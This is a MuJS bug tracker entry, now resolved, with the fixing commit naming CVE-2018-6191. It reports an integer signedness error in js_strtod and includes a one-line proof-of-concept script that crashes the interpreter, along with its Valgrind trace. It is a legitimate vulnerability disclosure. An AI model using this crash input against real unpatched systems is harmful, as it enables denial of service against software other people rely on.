| Summary: | Integer signedness error leading to Out-of-bounds read that causes crash | ||
|---|---|---|---|
| Product: | MuJS | Reporter: | invictus1306 <asindoni85> |
| Component: | general | Assignee: | Tor Andersson <tor.andersson> |
| Status: | RESOLVED FIXED | ||
| Severity: | blocker | CC: | chris.liddell |
| Priority: | P1 | ||
| Version: | unspecified | ||
| Hardware: | PC | ||
| OS: | Linux | ||
| Customer: | Word Size: | --- | |
commit 25821e6d74fab5fcc200fe5e818362e03e114428 (HEAD -> master, tor/master, origin/master, origin/HEAD, github/master) Author: Tor Andersson <tor.andersson@artifex.com> Date: Wed Jan 24 16:55:18 2018 +0100 Fix 698920: Guard jsdtoa from integer overflow wreaking havoc. This issue has been assigned CVE-2018-6191 |
Mujs has an integer signedness error leading to Out-of-bounds read that causes crash. Content of the poc file $ cat poc.js function pipo() {var 2e2147483648= 117486231123842366;} run it $ mujs poc.js SIGSEGV Valgrind report: ==2099== Memcheck, a memory error detector ==2099== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==2099== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info ==2099== Command: ./build/debug/mujs b.js ==2099== ==2099== Invalid read of size 8 ==2099== at 0x40D897: js_strtod (jsdtoa.c:725) ==2099== by 0x411C51: lexnumber (jslex.c:366) ==2099== by 0x41275D: jsY_lexx (jslex.c:567) ==2099== by 0x412FA0: jsY_lex (jslex.c:725) ==2099== by 0x4184A7: jsP_next (jsparse.c:138) ==2099== by 0x41BD5E: statement (jsparse.c:696) ==2099== by 0x41CBF9: scriptelement (jsparse.c:842) ==2099== by 0x41CC2C: script (jsparse.c:850) ==2099== by 0x41CD3E: funbody (jsparse.c:860) ==2099== by 0x418E61: fundec (jsparse.c:286) ==2099== by 0x41CBEB: scriptelement (jsparse.c:841) ==2099== by 0x41CC2C: script (jsparse.c:850) ==2099== Address 0x640000 is not stack'd, malloc'd or (recently) free'd ==2099== ==2099== ==2099== Process terminating with default action of signal 11 (SIGSEGV) ==2099== Access not within mapped region at address 0x640000 ==2099== at 0x40D897: js_strtod (jsdtoa.c:725) ==2099== by 0x411C51: lexnumber (jslex.c:366) ==2099== by 0x41275D: jsY_lexx (jslex.c:567) ==2099== by 0x412FA0: jsY_lex (jslex.c:725) ==2099== by 0x4184A7: jsP_next (jsparse.c:138) ==2099== by 0x41BD5E: statement (jsparse.c:696) ==2099== by 0x41CBF9: scriptelement (jsparse.c:842) ==2099== by 0x41CC2C: script (jsparse.c:850) ==2099== by 0x41CD3E: funbody (jsparse.c:860) ==2099== by 0x418E61: fundec (jsparse.c:286) ==2099== by 0x41CBEB: scriptelement (jsparse.c:841) ==2099== by 0x41CC2C: script (jsparse.c:850) ==2099== If you believe this happened as a result of a stack ==2099== overflow in your program's main thread (unlikely but ==2099== possible), you can try to increase the size of the ==2099== main thread stack using the --main-stacksize= flag. ==2099== The main thread stack size used in this run was 8388608. ==2099== ==2099== HEAP SUMMARY: ==2099== in use at exit: 118,560 bytes in 1,283 blocks ==2099== total heap usage: 1,385 allocs, 102 frees, 127,576 bytes allocated ==2099== ==2099== LEAK SUMMARY: ==2099== definitely lost: 0 bytes in 0 blocks ==2099== indirectly lost: 0 bytes in 0 blocks ==2099== possibly lost: 0 bytes in 0 blocks ==2099== still reachable: 118,560 bytes in 1,283 blocks ==2099== suppressed: 0 bytes in 0 blocks ==2099== Rerun with --leak-check=full to see details of leaked memory ==2099== ==2099== For counts of detected and suppressed errors, rerun with: -v ==2099== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault (core dumped) Some details about the bug: Inside the function js_strtod, after this line https://github.com/ccxvii/mujs/blob/81388eb40d29f10599ac30dde90e683a3c254375/jsdtoa.c#L714 exp = -exp; the value of "exp" is still negative (cause integer declaration). Please let me know if you need more information.